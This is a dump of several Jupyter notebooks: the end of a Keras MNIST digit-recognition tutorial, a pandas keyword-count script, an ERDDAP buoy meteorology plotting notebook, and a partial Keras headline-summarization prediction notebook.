"we then apply a dropout of 0.25 this helps prevent overfitting to out training set by droping out random nodes from our model at a 25% chance ratio.",
"_____no_output_____"
]
],
[
[
"# model.add(Dropout(0.25))",
"_____no_output_____"
]
],
[
[
"we then flatten the current layer back down to a one dimensional array.",
"_____no_output_____"
]
],
[
[
"# model.add(Flatten())",
"_____no_output_____"
]
],
[
[
"we then add a dense layer with 128 nodes dense layers are layers where all of the inputs are connected to all of the outputs. it also uses the same relu activation as discussed above.",
"_____no_output_____"
]
],
[
[
"# model.add(Dense(128, activation='relu'))",
"_____no_output_____"
]
],
[
[
"We then apply another dropout rate of 50% this time.This reduces the amount of weights in the dense layer by 50 percent as we are droping half of the nodes randomly. this is helpful as in a dense layer we have weights equal to the number of outputs times the number of inputs which can become very large. the dropout rate here not only prevents over fitting it greatly increases the efficency of our model training.",
"_____no_output_____"
]
],
[
[
"# model.add(Dropout(0.5))",
"_____no_output_____"
]
],
[
[
"Finaly we have the last dense layer this time with on node per desired output in this case it will be 10 as the model will be predicting a number between 0-9.",
"_____no_output_____"
]
],
[
[
"# model.add(Dense(10,activation=tf.nn.softmax))",
"_____no_output_____"
]
],
[
[
"we then need to complile the model. we are using adam optimiser with the spare categorical creossentropy for our loss function with the solo metric of accuracy. I chose the adam optimisation as its Computationally efficient and well suited for problems that are large in terms of data and/or parameters. since we are useing images for our inputs even at the reduced size of 28x28 pixels these advantages are incredibly useful. our taget predictions are integers and not one hot codeds so spare_categorical_crossentropy is the logical choice fot the loss function and we have chose to simply display accuracy of the prediction as our only metric",
"_____no_output_____"
]
],
[
[
"# model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])",
"_____no_output_____"
]
],
[
[
"We then fit our MNIST training data that we imported from the keras library to the model. we have decided to go with 10 iterations of the fitting to maxamise the accuracy of our results any thing more than 10 has seemed to produce neglibles results in this given problem. we will be using the test data we imported from the keras library as our validation set. and finaly we save the model weights so the user will only have to train the model once.",
"_____no_output_____"
]
],
[
[
"# model.fit(data_training, label_training,epochs=10,validation_data=(data_test, label_test))",
"_____no_output_____"
]
],
[
[
"#### Predicitions\n\nTo make predictions we simply convert the user input image to a numpy array and reshape it the (1,28,28,1) so as to match the values the model was trained on. the predict method will return an array with 10 values. the index of the value represents the number it is predicting. the values in the array represent the likelyhood of that result. so a simple argmax call on the prediciton array will return the most likely predicition.",
"_____no_output_____"
]
],
[
[
"#converts user inputed image\nnpImageArray = np.array(userimage)\n#predicts the digit from user image using the model\nprediction = model.predict(npImageArray.reshape(1,28,28,1))\n#returns predicted value\nreturn(prediction.argmax())",
"_____no_output_____"
]
],
[
[
"#### Performance\n\nThe main metric for performace we will be using for this model is the accuracy of the predicition as ultimately the goal of a digit recognition program is to be able to correctly recognise the digits. in the image bellow we will see the loss and accuracy values for each epoch of the training period. as we can see after completion of the tenth epoch we have an accuracy of 0.9831 or 98.31% while a result such as this may not be suficent for the likes of a self driving car as lifes can depend on it for the task of visual recognition a 98% accuracy is satisfactory.\n\n<img src=\"img/epoch.JPG\" width=\"600\" height=\"400\" align=\"left\" />",
"_____no_output_____"
],
[
"On a mid teir intel cpu each epoch took roughly 2 and half minutes leading to a 25 minute training time with all ten epochs the epoch value in the script can be changed to reduce the training time at a cost to accuracy.",
"_____no_output_____"
],
[
"### User Image\n\nThis section will cover the method the script uses of inporting the users image and how it preps this image for the predicition process.\n\nthe prep_image method takes in an image converts it to gray scale resizes the image to 28x28 pixels to match the mnist dataset we then flatten the image from 0-255 shades between white and black to two shades white or black. it then returns this modifyed image.\n\nwe then have the select image function. this is the function that will be called by the button in the user interface as will be discused in the following section. this function will access a pannel that the image will be displayed on. the path of the image will be taken from tkinters filedialog method that will open the windows explore and the user may select there image. it will then check to see if the path is not empty. as would be the case if the user clicked cancel instead of the image they wanted. we import the image from that path into our image varibale. we then convert the image from BGR to RGB witch are two difrent colour formats and we need the image to be in RGB to display it properly for the user. we then call the prep_image method as discussed above this preped image is then passed to the predicition method also discussed above. the prediction is printed to the console. the image panel is then instantiated if it is not already. The display image is set to the user image so we can see the image and the scripts prediciton at the same time. ",
"_____no_output_____"
],
[
"### User Interface\n\nFor this script we have written a very simply user inteface that simply consists of a select image button that will allow the user to select an image using the OS file explorer. this image will then be preped for predicition used with the model to get a predicition which will be printed to the console and the userinterface will display the image the user selected.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e708e65904c03c5206fa86cf26b9cd04ddc2b2ab | 7,212 | ipynb | Jupyter Notebook | project/Front/Front_s/word_count.ipynb | yoonputer/Project_Guardians | c7643c32dfe761f8c9faf3e160a3be26a1948d48 | [
"Apache-2.0"
] | null | null | null | project/Front/Front_s/word_count.ipynb | yoonputer/Project_Guardians | c7643c32dfe761f8c9faf3e160a3be26a1948d48 | [
"Apache-2.0"
] | null | null | null | project/Front/Front_s/word_count.ipynb | yoonputer/Project_Guardians | c7643c32dfe761f8c9faf3e160a3be26a1948d48 | [
"Apache-2.0"
] | 2 | 2021-09-10T11:19:25.000Z | 2021-09-23T23:58:33.000Z | 7,212 | 7,212 | 0.510399 | [
[
[
"import pandas as pd",
"_____no_output_____"
],
[
"df = pd.read_excel('2019.xlsx')",
"_____no_output_____"
],
[
"top = df['특성추출(가중치순 상위 50개)']",
"_____no_output_____"
],
[
"words = []\n\nfor i in range(len(top)):\n a = str(top[i])\n wordlist = a.split(',')\n words.append(wordlist) ",
"_____no_output_____"
],
[
"word_list = []\nfor word in words:\n word_list += word",
"_____no_output_____"
],
[
"wordcount = {}\n\nfor word in word_list:\n wordcount[word] = wordcount.get(word, 0) + 1\n keys = sorted(wordcount.keys())",
"_____no_output_____"
],
[
"df = pd.DataFrame(wordcount, index = ['count'])\ndf = df.transpose()\ndf['year'] = 2019\ndf",
"_____no_output_____"
],
[
"len(df)",
"_____no_output_____"
],
[
"count = df['count'] > 150\ndf = df.loc[count,:]\ndf",
"_____no_output_____"
],
[
"df.to_excel('2019_count.xlsx')",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e708e75daf39ab3a889fa37cfe91d6358af5d81c | 348,438 | ipynb | Jupyter Notebook | PrawlerDeployments/ERDDAP_PMEL_2019_Meteorology.ipynb | shaunwbell/ipythonnb | c2f35b1524dc14fb0f12a8846a794af1bd3b3d3a | [
"MIT"
] | 3 | 2017-03-23T16:52:44.000Z | 2022-03-08T16:53:29.000Z | PrawlerDeployments/ERDDAP_PMEL_2019_Meteorology.ipynb | shaunwbell/ipythonnb | c2f35b1524dc14fb0f12a8846a794af1bd3b3d3a | [
"MIT"
] | null | null | null | PrawlerDeployments/ERDDAP_PMEL_2019_Meteorology.ipynb | shaunwbell/ipythonnb | c2f35b1524dc14fb0f12a8846a794af1bd3b3d3a | [
"MIT"
] | 2 | 2017-03-30T22:01:25.000Z | 2019-10-17T17:30:29.000Z | 332.796562 | 71,828 | 0.91701 | [
[
[
"## SFC Meteorology Obs from:\n** - 2019 M2 (BSITAEPR-2A) ** \n*** - 2019 M2 (BSM-2A) ***\n\n__pyversion__==3.6 \n__author__==S.Bell",
"_____no_output_____"
]
],
[
[
"import datetime\nprint(\"Last run {0}\".format(datetime.datetime.now()))",
"Last run 2019-09-26 17:22:27.139992\n"
]
],
[
[
"### connecting to erddap and retrieving and basic information",
"_____no_output_____"
]
],
[
[
"from erddapy import ERDDAP\nimport pandas as pd\nimport numpy as np\n\nserver_url = 'http://downdraft.pmel.noaa.gov:8080/erddap'\n\ne = ERDDAP(server=server_url)",
"_____no_output_____"
],
[
"df = pd.read_csv(e.get_search_url(response='csv', search_for='a_met'))",
"_____no_output_____"
],
[
"'We have {} tabledap, {} griddap, and {} wms endpoints.'.format(\n len(set(df['tabledap'].dropna())),\n len(set(df['griddap'].dropna())),\n len(set(df['wms'].dropna()))\n)",
"_____no_output_____"
],
[
"datasets = df['Dataset ID'].values\nprint(datasets)",
"['erddap_17ckitaem2a_met' 'erddap_18bsitaepr2a_met'\n 'erddap_18mtitaepr1a_met' 'erddap_19bsitaepr2a_met']\n"
],
[
"variables = [e.get_var_by_attr(dataset_id=dataset, standard_name=lambda v: v is not None) for dataset in datasets]\nprint(variables)",
"[['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'wind_speed', 'time', 'longitude', 'wind_from_direction'], ['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'wind_speed', 'time', 'longitude', 'wind_from_direction'], ['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'wind_speed', 'time', 'longitude', 'wind_from_direction'], ['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'time', 'longitude']]\n"
]
],
[
[
"### getting Peggy Buoy (BSM-2A) Data",
"_____no_output_____"
]
],
[
[
"wdf = pd.read_csv('http://pavlof.pmel.noaa.gov/bell/ArgosMooring/data/TotalArgosMessage_28882.csv',\n parse_dates=True,index_col='sampletime')",
"_____no_output_____"
],
[
"wdf = wdf.resample('1H').mean()",
"_____no_output_____"
]
],
[
[
"### retrieving erddap and plotting data",
"_____no_output_____"
]
],
[
[
"constraints = {\n 'time>=': '2019-04-25T00:00:00Z',\n 'time<=': str(datetime.datetime.today()),\n}\n\nstart_date = '2019-04-15'\nend_date = '2019-10-01'\n\nvariables = [\n# 'wind_from_direction', \n 'air_temperature',\n 'relative_humidity',\n 'northward_wind', \n 'eastward_wind', \n# 'wind_speed', \n 'latitude',\n 'longitude',\n 'time'\n]\n\nvariable_dic={}\n\nfor index,row in df.iterrows():\n info_url = e.get_info_url(dataset_id=row['Dataset ID'], response='csv')\n info = pd.read_csv(info_url)\n\n #print(info.head())\n print('Variables in {}:'.format(row['Dataset ID']))\n print(','.join(info.loc[info['Row Type'] == 'variable', 'Variable Name']))\n\n variable_dic.update({row['Dataset ID']:list(info.loc[info['Row Type'] == 'variable', 'Variable Name'])})\n ",
"Variables in erddap_17ckitaem2a_met:\ntimeseries_id,time,wind_speed,northward_wind,latitude,longitude,air_pressure,relative_humidity,air_temperature,wind_from_direction,eastward_wind\nVariables in erddap_18bsitaepr2a_met:\ntimeseries_id,time,wind_speed,northward_wind,latitude,longitude,air_pressure,relative_humidity,air_temperature,wind_from_direction,eastward_wind\nVariables in erddap_18mtitaepr1a_met:\ntimeseries_id,time,wind_speed,northward_wind,latitude,longitude,air_pressure,relative_humidity,air_temperature,wind_from_direction,eastward_wind\nVariables in erddap_19bsitaepr2a_met:\ntimeseries_id,latitude,longitude,time,northward_wind,air_pressure,relative_humidity,air_temperature,eastward_wind\n"
],
[
"from requests.exceptions import HTTPError\n\ndfs = {}\nfor index,row in df.iterrows():\n if row['Dataset ID'] in ['erddap_19bsitaepr2a_met']:\n print(row['Dataset ID'])\n try:\n e = ERDDAP(server=server_url,\n protocol='tabledap',\n response='csv',\n )\n e.dataset_id=row['Dataset ID']\n e.constraints=constraints\n if row['Dataset ID'] in ['erddap_19bsitaepr2a_met']:\n e.variables=variables + ['air_pressure']\n except HTTPError:\n print('Failed to generate url {}'.format(row['Dataset ID']))\n continue\n dfs.update({row['Dataset ID']: e.to_pandas(\n index_col='time (UTC)',\n parse_dates=True,\n skiprows=(1,) # units information can be dropped.\n )})\n ",
"erddap_19bsitaepr2a_met\n"
],
[
"df=dfs['erddap_19bsitaepr2a_met']\ndf.columns",
"_____no_output_____"
]
],
[
[
"### Take care of any preliminary QC",
"_____no_output_____"
]
],
[
[
"#calculate windspeed and direction\ndf['wind_speed (m s-1)']=np.sqrt(df['northward_wind']**2 + df['eastward_wind']**2)\ndf['wind_from_direction (degrees true)'] = 270-np.rad2deg(np.arctan2(df['northward_wind'],\n df['eastward_wind']))\n\ndf['wind_from_direction (degrees true)'][df['wind_from_direction (degrees true)']>360] = df['wind_from_direction (degrees true)'][df['wind_from_direction (degrees true)']>360]-360\n",
"_____no_output_____"
],
[
"#eliminate unlikely wind and pressure extremes\nfor ds, df in dfs.items():\n df['wind_speed (m s-1)'][df['wind_speed (m s-1)']>100] = np.nan\n df['air_pressure'][df['air_pressure']<940] = np.nan\n df['air_temperature'][df['air_temperature']>50] = np.nan\n \n#Arbitrary QC points based on evaluating plot / local characteristics and not broad science boundaries\nwdf.WS[wdf.WS>25] = np.nan\nwdf.RH[wdf.RH<25] = np.nan\nwdf.BP[wdf.BP<975] = np.nan",
"_____no_output_____"
]
],
[
[
"### Plot",
"_____no_output_____"
]
],
[
[
"import matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n### specify primary bulk figure parameters\nfontsize = 10\nlabelsize = 10\n#plotstyle = 'seaborn'\nmax_xticks = 10\nplt.style.use('seaborn-ticks')\nmpl.rcParams['svg.fonttype'] = 'none'\nmpl.rcParams['ps.fonttype'] = 42 #truetype/type2 fonts instead of type3\nmpl.rcParams['pdf.fonttype'] = 42 #truetype/type2 fonts instead of type3\nmpl.rcParams['axes.grid'] = False\nmpl.rcParams['axes.edgecolor'] = 'black'\nmpl.rcParams['axes.linewidth'] = 1.5\nmpl.rcParams['axes.labelcolor'] = 'black'\nmpl.rcParams['grid.linestyle'] = '--'\nmpl.rcParams['grid.linestyle'] = '--'\nmpl.rcParams['xtick.major.size'] = 4\nmpl.rcParams['xtick.minor.size'] = 2\nmpl.rcParams['xtick.major.width'] = 2\nmpl.rcParams['xtick.minor.width'] = 0.5\nmpl.rcParams['ytick.major.size'] = 4\nmpl.rcParams['ytick.minor.size'] = 2\nmpl.rcParams['ytick.major.width'] = 2\nmpl.rcParams['ytick.minor.width'] = 0.5\nmpl.rcParams['ytick.direction'] = 'out'\nmpl.rcParams['xtick.direction'] = 'out'\nmpl.rcParams['ytick.color'] = 'black'\nmpl.rcParams['xtick.color'] = 'black'",
"_____no_output_____"
],
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.dates import YearLocator, WeekdayLocator, MonthLocator, DayLocator, HourLocator, DateFormatter\nimport matplotlib.ticker as ticker\n\nimport cmocean",
"_____no_output_____"
],
[
"fig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['air_temperature'].plot(ax=ax)\n plt.ylabel('Temperature (degC)')\n except:\n pass\nwdf.AT.plot(ax=ax)\nplt.legend(['19BSITAEPR-2A','19BSM-2A'])\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n\nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['air_pressure'].plot(ax=ax)\n plt.ylabel('Pressure (mb)')\n except:\n df['air_pressure (mbar)'].plot(ax=ax)\n plt.ylabel('Pressure (mb)')\nwdf.BP.plot(ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n\nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['relative_humidity'].plot(ax=ax)\n plt.ylabel('RH (%)')\n except:\n pass\nwdf.RH.plot(ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n \nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['wind_speed (m s-1)'].plot(ax=ax)\n plt.ylabel('wind_speed (m/s)')\n except:\n pass\nwdf.WS.plot(ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n\nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['wind_from_direction (degrees true)'].plot(style='.',markersize=3.0,ax=ax)\n plt.ylabel('wind direction (degree)')\n except:\n pass\nwdf.WD.plot(style='.',markersize=4.0,ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))",
"_____no_output_____"
],
[
"wdf.tail()",
"_____no_output_____"
],
[
"df.tail()",
"_____no_output_____"
]
],
[
[
"### Next Steps\n\n**TODO:** Plot top prawler bin/air temp for a SST/Air analysis",
"_____no_output_____"
]
],
[
[
"d = ERDDAP(server=server_url,\n protocol='tabledap',\n response='csv',\n )\n\nd.dataset_id='erddap_19bsitaepr2a_prawler'\n\nd.variables = [\n 'profile_id',\n 'Temperature',\n 'depth',\n \"time\",\n]\n\nd.constraints = {\n 'time>=': '2019-01-01T00:00:00Z',\n 'time<=': '2019-10-10T00:00:00Z',\n}\n\ndf_sst = d.to_pandas(\n index_col='time (UTC)',\n parse_dates=True,\n skiprows=(1,) # units information can be dropped.\n).dropna()\n\ndf_sst.sort_index(inplace=True)\n\ndf_sst.head()",
"_____no_output_____"
],
[
"dfint= df_sst.groupby('profile_id')\nsst,sst_time = [], []\nfor i,cast in enumerate(dfint.groups):\n if (dfint.get_group(cast)['depth (m)'].std() > 5) and (dfint.get_group(cast)['depth (m)'].min() < 5):\n sst_time = sst_time + [dfint.get_group(cast).index[0]]\n #print(dfint.get_group(cast)['Temperature'][0:10])\n sst = sst +[(dfint.get_group(cast)['Temperature'][0:5]).median()]",
"_____no_output_____"
],
[
"fig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n plt.plot(df.index,df['air_temperature'])\n plt.ylabel('Temperature (degC)')\n except:\n pass\nplt.plot(wdf.index,wdf.AT)\nplt.plot(sst_time,sst)\nplt.legend(['19BSITAEPR-2A','19BSM-2A','19BSITAEPR-2A proxy sst'])\nax.set_xlim(start_date, end_date)\nxfmt = mdates.DateFormatter('%d-%b')\nax.xaxis.set_major_locator(DayLocator(bymonthday=15))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,5)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%d\\n%b %y'))\nax.xaxis.set_tick_params(which='major', pad=3)\nax.xaxis.set_tick_params(which='minor', pad=5)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e708ea0f6740887aaf88f130fbf2f8d66f38d46a | 61,728 | ipynb | Jupyter Notebook | predict.ipynb | LRParser/How_to_make_a_text_summarizer | 9a1b1247d8b33ef9d2c3800645dd38e9013ee654 | [
"MIT"
] | null | null | null | predict.ipynb | LRParser/How_to_make_a_text_summarizer | 9a1b1247d8b33ef9d2c3800645dd38e9013ee654 | [
"MIT"
] | 3 | 2017-04-28T17:48:14.000Z | 2019-08-15T20:42:28.000Z | predict.ipynb | LRParser/How_to_make_a_text_summarizer | 9a1b1247d8b33ef9d2c3800645dd38e9013ee654 | [
"MIT"
] | 3 | 2017-04-14T13:50:39.000Z | 2021-09-05T15:39:25.000Z | 41.06986 | 1,848 | 0.603502 | [
[
[
"FN = 'predict'",
"_____no_output_____"
]
],
[
[
"if your GPU is busy you can use CPU for predictions",
"_____no_output_____"
]
],
[
[
"import os\n#os.environ['THEANO_FLAGS'] = 'device=cpu,floatX=float32'",
"_____no_output_____"
],
[
"import keras\nkeras.__version__",
"Using TensorFlow backend.\n"
]
],
[
[
"Generate headlines using the \"simple\" model from http://arxiv.org/pdf/1512.01712v1.pdf",
"_____no_output_____"
],
[
"Use indexing of tokens from [vocabulary-embedding](./vocabulary-embedding.ipynb) this does not clip the indexes of the words to `vocab_size`.\n\nUse the index of outside words to replace them with several `oov` words (`oov` , `oov0`, `oov`...) that appear in the same description and headline. This will allow headline generator to replace the oov with the same word in the description",
"_____no_output_____"
]
],
[
[
"FN0 = 'vocabulary-embedding'",
"_____no_output_____"
]
],
[
[
"we will generate predictions using the model generated in this notebook",
"_____no_output_____"
]
],
[
[
"FN1 = 'train'",
"_____no_output_____"
]
],
[
[
"input data (`X`) is made from `maxlend` description words followed by `eos`\nfollowed by headline words followed by `eos`\nif description is shorter than `maxlend` it will be left padded with `empty`\nif entire data is longer than `maxlen` it will be clipped and if it is shorter it will be padded.\n\nlabels (`Y`) are the headline words followed by `eos` and clipped or padded to `maxlenh`\n\nIn other words the input is made from a `maxlend` half in which the description is padded from the left\nand a `maxlenh` half in which `eos` is followed by a headline followed by another `eos` if there is enough space.\n\nThe labels match only the second half and \nthe first label matches the `eos` at the start of the second half (following the description in the first half)",
"_____no_output_____"
],
[
"the model parameters should be identical with what used in training but notice that `maxlend` is flexible",
"_____no_output_____"
]
],
[
[
"maxlend=50 # 0 - if we dont want to use description at all\nmaxlenh=25\nmaxlen = maxlend + maxlenh\nrnn_size = 512\nrnn_layers = 3 # match FN1\nbatch_norm=False",
"_____no_output_____"
]
],
[
[
"the out of the first `activation_rnn_size` nodes from the top layer will be used for activation and the rest will be used to select predicted word",
"_____no_output_____"
]
],
[
[
"activation_rnn_size = 40 if maxlend else 0",
"_____no_output_____"
],
[
"# training parameters\nseed=42\np_W, p_U, p_dense, p_emb, weight_decay = 0, 0, 0, 0, 0\noptimizer = 'adam'\nbatch_size=64",
"_____no_output_____"
],
[
"nb_train_samples = 30000\nnb_val_samples = 3000",
"_____no_output_____"
]
],
[
[
"# read word embedding",
"_____no_output_____"
]
],
[
[
"import cPickle as pickle\n\nwith open('data/%s.pkl'%FN0, 'rb') as fp:\n embedding, idx2word, word2idx, glove_idx2idx = pickle.load(fp)\nvocab_size, embedding_size = embedding.shape",
"_____no_output_____"
],
[
"nb_unknown_words = 10",
"_____no_output_____"
],
[
"print 'dimension of embedding space for words',embedding_size\nprint 'vocabulary size', vocab_size, 'the last %d words can be used as place holders for unknown/oov words'%nb_unknown_words\nprint 'total number of different words',len(idx2word), len(word2idx)\nprint 'number of words outside vocabulary which we can substitue using glove similarity', len(glove_idx2idx)\nprint 'number of words that will be regarded as unknonw(unk)/out-of-vocabulary(oov)',len(idx2word)-vocab_size-len(glove_idx2idx)",
"dimension of embedding space for words 100\nvocabulary size 40000 the last 10 words can be used as place holders for unknown/oov words\ntotal number of different words 1382058 1382058\nnumber of words outside vocabulary which we can substitue using glove similarity 122933\nnumber of words that will be regarded as unknonw(unk)/out-of-vocabulary(oov) 1219125\n"
],
[
"for i in range(nb_unknown_words):\n idx2word[vocab_size-1-i] = '<%d>'%i",
"_____no_output_____"
],
[
"for i in range(vocab_size-nb_unknown_words, len(idx2word)):\n idx2word[i] = idx2word[i]+'^'",
"_____no_output_____"
],
[
"empty = 0\neos = 1\nidx2word[empty] = '_'\nidx2word[eos] = '~'",
"_____no_output_____"
],
[
"import numpy as np\nfrom keras.preprocessing import sequence\nfrom keras.utils import np_utils\nimport random, sys",
"_____no_output_____"
],
[
"def prt(label, x):\n print label+':',\n for w in x:\n print idx2word[w],\n print",
"_____no_output_____"
]
],
[
[
"# Model",
"_____no_output_____"
]
],
[
[
"from keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Dropout, RepeatVector, Merge, TimeDistributedDense\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.embeddings import Embedding\nfrom keras.regularizers import l2\nfrom keras.layers.core import Lambda\nimport keras.backend as K",
"_____no_output_____"
],
[
"# seed weight initialization\nrandom.seed(seed)\nnp.random.seed(seed)",
"_____no_output_____"
],
[
"regularizer = l2(weight_decay) if weight_decay else None",
"_____no_output_____"
]
],
[
[
"## rnn model",
"_____no_output_____"
],
[
"start with a stacked LSTM, which is identical to the bottom of the model used in training",
"_____no_output_____"
]
],
[
[
"rnn_model = Sequential()\nrnn_model.add(Embedding(vocab_size, embedding_size,\n input_length=maxlen,\n W_regularizer=regularizer, dropout=p_emb, weights=[embedding], mask_zero=True,\n name='embedding_1'))\nfor i in range(rnn_layers):\n lstm = LSTM(rnn_size, return_sequences=True, # batch_norm=batch_norm,\n W_regularizer=regularizer, U_regularizer=regularizer,\n b_regularizer=regularizer, dropout_W=p_W, dropout_U=p_U,\n name='lstm_%d'%(i+1)\n )\n rnn_model.add(lstm)\n rnn_model.add(Dropout(p_dense, name='dropout_%d'%(i+1)))",
"_____no_output_____"
]
],
[
[
"### load",
"_____no_output_____"
],
[
"use the bottom weights from the trained model, and save the top weights for later",
"_____no_output_____"
]
],
[
[
"import h5py\ndef str_shape(x):\n return 'x'.join(map(str,x.shape))\n\ndef inspect_model(model):\n print model.name\n for i,l in enumerate(model.layers):\n print i, 'cls=%s name=%s'%(type(l).__name__, l.name)\n weights = l.get_weights()\n for weight in weights:\n print str_shape(weight),\n print\n\ndef load_weights(model, filepath):\n \"\"\"Modified version of keras load_weights that loads as much as it can\n if there is a mismatch between file and model. It returns the weights\n of the first layer in which the mismatch has happened\n \"\"\"\n print 'Loading', filepath, 'to', model.name\n flattened_layers = model.layers\n with h5py.File(filepath, mode='r') as f:\n # new file format\n layer_names = [n.decode('utf8') for n in f.attrs['layer_names']]\n\n # we batch weight value assignments in a single backend call\n # which provides a speedup in TensorFlow.\n weight_value_tuples = []\n for name in layer_names:\n print name\n g = f[name]\n weight_names = [n.decode('utf8') for n in g.attrs['weight_names']]\n if len(weight_names):\n weight_values = [g[weight_name] for weight_name in weight_names]\n try:\n layer = model.get_layer(name=name)\n except:\n layer = None\n if not layer:\n print 'failed to find layer', name, 'in model'\n print 'weights', ' '.join(str_shape(w) for w in weight_values)\n print 'stopping to load all other layers'\n weight_values = [np.array(w) for w in weight_values]\n break\n symbolic_weights = layer.trainable_weights + layer.non_trainable_weights\n weight_value_tuples += zip(symbolic_weights, weight_values)\n weight_values = None\n K.batch_set_value(weight_value_tuples)\n return weight_values",
"_____no_output_____"
],
[
"weights = load_weights(rnn_model, 'data/%s.hdf5'%FN1)",
"Loading data/train.hdf5 to sequential_1\nembedding_1\nlstm_1\ndropout_1\nlstm_2\ndropout_2\nlstm_3\ndropout_3\nsimplecontext_1\ntimedistributed_1\nfailed to find layer timedistributed_1 in model\nweights 944x40000 40000\nstopping to load all other layers\n"
],
[
"[w.shape for w in weights]",
"_____no_output_____"
]
],
[
[
"## headline model",
"_____no_output_____"
],
[
"A special layer that reduces the input just to its headline part (second half).\nFor each word in this part it concatenate the output of the previous layer (RNN)\nwith a weighted average of the outputs of the description part.\nIn this only the last `rnn_size - activation_rnn_size` are used from each output.\nThe first `activation_rnn_size` output is used to computer the weights for the averaging.",
"_____no_output_____"
]
],
[
[
"context_weight = K.variable(1.)\nhead_weight = K.variable(1.)\ncross_weight = K.variable(0.)\n\ndef simple_context(X, mask, n=activation_rnn_size, maxlend=maxlend, maxlenh=maxlenh):\n desc, head = X[:,:maxlend], X[:,maxlend:]\n head_activations, head_words = head[:,:,:n], head[:,:,n:]\n desc_activations, desc_words = desc[:,:,:n], desc[:,:,n:]\n \n # RTFM http://deeplearning.net/software/theano/library/tensor/basic.html#theano.tensor.batched_tensordot\n # activation for every head word and every desc word\n activation_energies = K.batch_dot(head_activations, desc_activations, axes=([2],[2]))\n # make sure we dont use description words that are masked out\n # assert mask.ndim == 2\n activation_energies = K.switch(mask[:, None, :maxlend], activation_energies, -1e20)\n \n # for every head word compute weights for every desc word\n activation_energies = K.reshape(activation_energies,(-1,maxlend))\n activation_weights = K.softmax(activation_energies)\n activation_weights = K.reshape(activation_weights,(-1,maxlenh,maxlend))\n\n # for every head word compute weighted average of desc words\n desc_avg_word = K.batch_dot(activation_weights, desc_words, axes=([2],[1]))\n return K.concatenate((context_weight*desc_avg_word, head_weight*head_words))\n\n\nclass SimpleContext(Lambda):\n def __init__(self,**kwargs):\n super(SimpleContext, self).__init__(simple_context,**kwargs)\n self.supports_masking = True\n\n def compute_mask(self, input, input_mask=None):\n return input_mask[:, maxlend:]\n \n def get_output_shape_for(self, input_shape):\n nb_samples = input_shape[0]\n n = 2*(rnn_size - activation_rnn_size)\n return (nb_samples, maxlenh, n)",
